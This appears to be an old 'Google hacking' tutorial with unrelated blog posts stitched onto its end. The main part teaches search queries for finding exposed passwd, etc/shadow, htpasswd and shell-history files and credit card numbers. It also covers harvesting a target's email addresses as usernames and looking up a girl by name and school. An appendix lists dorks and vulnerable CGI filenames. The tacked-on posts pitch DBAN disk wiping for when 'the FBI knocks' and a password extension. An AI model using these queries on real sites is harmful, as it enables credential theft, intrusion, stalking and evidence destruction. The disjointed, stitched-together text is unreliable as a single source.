-Now, click on preferences- Most of this should be fine preset, but make sure you fill in the "do not filter my
search results," and select 100 results per page from the drop down menu, then fill in the last bubble (if thats
your thing). Click save preferences (note: they will only be saved if you have cookies enabled).
-Now that you have everything set up, let's see everything google has to offer (because google has a slew of useful
tools). First theres the web search, which is the topic of this article. After that theres the image search, which
is pretty useful if you want to find a picture of someone you know (I will go into detail later on), or if you just
wannt to find some free porn! Sicko. Next up: Groups. I LOVE this feature! You can search year, and years, and years,
of posts on USENET discussion boards. I have gotten SO much valuable information (mostly stuff to help me crack my
target) just by using this feature. I will also go indepth on this feature as well. Next to last: Directory searching.
This is pretty useful if you want to find information on a TOPIC. For instance if you wanted to do a biology project
on genetic disorders you would use this. Last up: News. This is a fairly new feature, added a few months ago. It
tells you how recent articles are (by the hour, pretty cool!). You can look at world news on World, U.S., buisness,
Science/Tech, Sports, Entertainment, and Health.
II.Google for Web searches
(BASIC)
-Well, you've got a broad sense of what google does, so lets get right into the specifics! I can hardly wait!
A. Deciding on keywords
-Try specific keywords first (i.e. search for elephant as opposed to animals)
-Make searches as specific as you can.
-Keep searches as specific as you can!
+Note: The more specific you want your search to be, the more words you need, and you'll get less results
(this can be a bad or good thing)
B. How it works
-When you search for hacker tutorials, google interprets it as hacker AND tutorials, so it returns only pages
with all of the keywords you entered by default
-When you search for tutorials for hackers, the word for is omitted, as are all other words like if, a, who,
what, when, where, and how. If you need to include a common word in your search phrase use a '+' before the
common word. Your search is now tutorials +for hackers.
+note: google is not case sensitive
+note: google does not use wildcards (searching for googl* will not return google)
(ADVANCED)
A. ""'s
-Using quotations is probably the most important part of an advanced search. You can really control the
results of your search using quotes. When you use quotes, all of your results will contain the exact phrase.
So if you were to search "Tutorial for hacking" Google would search 3,083,324,652 web sites for that exact
phrase.
-You can put part of your search in quotes, and the other a regular search. For instance, if I wanted to find
out what pages my friend that just happens to be a girl is on the internet, I would search "Firstname
Lastname" Thomas Dale. This would search for the exact phrase "her name" and then it would search for any
pages that contained the words Thomas Dale(Thomas Dale is my highschool).
+Find me! My name is alejandro(alex), and i'm part of the smart-dev community ;)
B. "-"'s
-Using '-' to omit results. Perhaps you're searching for a new type of password file, for a new webserver.
The password file is called passwerd.db, but when you do a simple in title search(just keep reading, you'll
understand later) all you get is a bunch of results that turn out to be a config file that has syntax
referring to passwerd.db. Lets say this config file is named config(go figure). Omit this from your search
simply by searching searchstring -config and viola you get a list of sites that display passwerd.db to the
public! You can also use the boolean term NOT.
(HACKING/CRACKING)
Yay! This is why I wrote this article!
INTRO TO HACKING/CRACKIGN WITH GOOGLE
-Many of you probably already know this, but you can hack/crack with google. I use it in 100% of the
hacks/cracks I perform. You can use google to help you hack/crack in a few different ways. I will discuss
these in the sections below ("no shit!")
A. intitle:
-This is a built in function in google that searches for your phrase in the title of a web page. The
title of a webpage is in the upper left of your current window. (you should see google.txt if someone
hasnt changed the name). This is useful if you want to find something VERY specific.
-examples: intitle:"billing" intitle:"payments" intitle:"passwd"
B. Directory Indexing
-One GREAT trick is to find sites that allow directory indexing. This can be done by searching
intitle:"index of" phrase. Your mind should now be about to explode with the possibilities this could
hold. If it doesn't, that's ok, because if you look at the end of this article you'll see i've
provided you with an uber cool list! Here are some basic phrases you can use: intitle:"index of"
"passwd" OR "passwd.txt" OR "AutismIsSoCool!". This searches for files named passwd or if that isnt
found, searches for passwd.txt or if that isnt found searches for AutismIsCool! Think original, and
you can come up with the coolest stuff! I'm not just talking about passwords... I'm talking about
warez, passwords, and even credit card numbers!!! (although to be honest it's not easy ;))
C. allinurl:
-Guess what this does! Basically I use this when I want to find a piece of software. When i'm at school we
have some stupid web site filter, that doesn't allow me to download AIM (AOL instant messenger uhhh tm) so
basically I just do a search for allinurl:"aim.exe" and I get to take my pick! This can also be used for
passwd, passwd.txt, and so on
D. Cache
-Perhaps you have been searching for intitle:"index of" etc/shadow, and you see what looks like a valid
shadow file in your results list, but you cant access it, because you arent root, or whatever. Well thanks to
google cache, it may be possible for you to view this file. Just click the little chached link under the
result!
+note: this doesnt work 100% of the time
E. Collecting info on your target
-You can use google to find all sorts of juicy information about your target. For instance, if you wanted to
know what @target.com addresses were on the site, just search "@target.com" site:www.target.com. You should
get a nice list of email addresses. (these can double as usernames for other things besides emails)
-GOOGLE GROUPS is a great way to get info on a target. Just click the groups tab and search for @target.com,
and you will see everything anyone from your target has EVER posted on a usenet board! This is a real good
one!
THATS IT! THAT'S THE WHOLE TUTORIAL!
Summary: Well I hope you learned something from this article. Wether you were a complete noob, an advanced internet user,
or an ereet hacker, I tried to teach you all something. Remember- don't ever give up after only a few minutes of
searching... You'll get the right combination of keywords sooner or later. Just try to imagine what words you would use
for the item you are trying to find ;). Now GO! I officialy deem you "Google lord!"
(APPENDIX A)
-This is a list of all the cool searches I've found over the years
-PLEASE add to it! add your searches, and put the date you added it next to the search, then upload it somewhere
allinurl: winnt/system32/ (get cmd.exe)
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart **GOOD ONE!
-and hey! wouldnt you know it! someone has already taken care of the rest of this appendix for me! Thanks Johnny!
/*/*/*The following list was taken from johnny.ihackstuff.com*\*\*\
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi
Emergency Data Destruction With Boot and Nuke
Need to securely erase any hard drives hooked to your PC automatically when the FBI knocks on the door? Lets hope that isn’t the case, but if so Darik’s Boot and Nuke is the perfect solution. Darik’s Boot and Nuke is a ’self contained floppy disc’ that securely wipes all hard drives detected on the local PC.
From the README:
1.0 About Darik’s Boot and Nuke
——————————–Darik’s Boot and Nuke (”DBAN”) is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and completely
delete the contents of any hard disk that it can detect, which makes it an
appropriate utility for bulk or emergency data destruction.
Download the exe and write the image to a floppy. Just make sure your kids or little brother don’t accidentally get a hold of the disk a boot from it!
Linux users can also unzip the exe and use dd to transfer the image to a floppy (see the README).
I know a lot of you know longer have floppy drives - there are more convenient DBAN CD images available.
How to automatically wipe all hard drives
WARNING: THIS WILL PERMANENTLY ERASE ALL DATA ON ALL HARD DRIVE HOOKED TO THE PC!!!
- Boot from the DBAN floppy or CD image.
- Enter ‘autonuke’ at the boot prompt.
And it is as simple as that! Hope you enjoyed and if you have any other methods of securely wiping your hard drives on the fly let us know in the comments!
Firefox Adons
Well seen as though we were talking about breaking passwords, here’s a tool for Firefox to help you manage your more secure passwords.
Better security without bursting your brain
Password Hasher is a Firefox security extension for generating site-specific strong passwords from one (or a few) master key(s).
What good security practice demands:
- Strong passwords that are hard to guess.
- Different passwords at each site.
- Periodically changing existing passwords.
- Strong passwords are difficult to remember.
- Juggling a multitude of passwords is a pain.
- Updating passwords compounds the memorization problem.
- Strong passwords are automatically generated.
- The same master key produces different passwords at many sites.
- You can quickly upgrade passwords by “bumping” the site tag.
- You can upgrade the master key without updating all sites at once.
- It supports different length passwords.
- It supports special requirements, such as digit and punctuation characters.
- All data is saved to the browser’s secure password database.
passhash-1.0.5.xpi
firefox themes great collection
Emulators
Miscellaneous
Operating System Integration
Themed
Aero Fox - All black and blue, kind of like how I ended up after the last Internet Explorer 7 fan club meeting I attended.
Social Profiles
